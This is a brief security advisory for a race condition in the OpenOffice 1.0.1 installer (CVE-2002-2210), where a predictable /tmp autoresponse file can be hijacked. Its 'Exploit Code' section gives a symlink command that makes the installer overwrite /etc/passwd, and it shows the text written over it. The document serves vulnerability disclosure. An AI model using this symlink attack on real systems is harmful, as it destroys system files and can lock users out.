Title: OpenOffice 1.0.1 Race condition during installation Author: Larry W. Cashdollar, @_larry0 Date: 2009-09-02 CVE-ID:[CVE-2002-2210] Download Site: http://www.openoffice.org/dev_docs/source/1.0.1/index.html Vendor: Open Office Vendor Notified: 2009-09-02 Vendor Contact: bugtraq Advisory: http://www.vapid.dhs.org/advisories/openoffice_race_condition_during_installation.html Description: The open office desktop suite. Vulnerability: A very simple and easy to exploit race condition exist during the installation of OpenOffice. During this window a malicous user could create a symlink in /tmp and overwrite arbitrary files. Export: JSON TEXT XML Exploit Code: As a normal user: lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf will result in the password file being over written with: # create the proper autoresponse file <file> cat << EOF > /tmp/${USER}autoresponse.conf [ENVIRONMENT] INSTALLATIONMODE=$installtype INSTALLATIONTYPE=STANDARD DESTINATIONPATH=$prefix/$oohome OUTERPATH= LOGFILE= LANGUAGELIST=<LANGUAGE> [JAVA] JavaSupport=preinstalled_or_none EOF </file>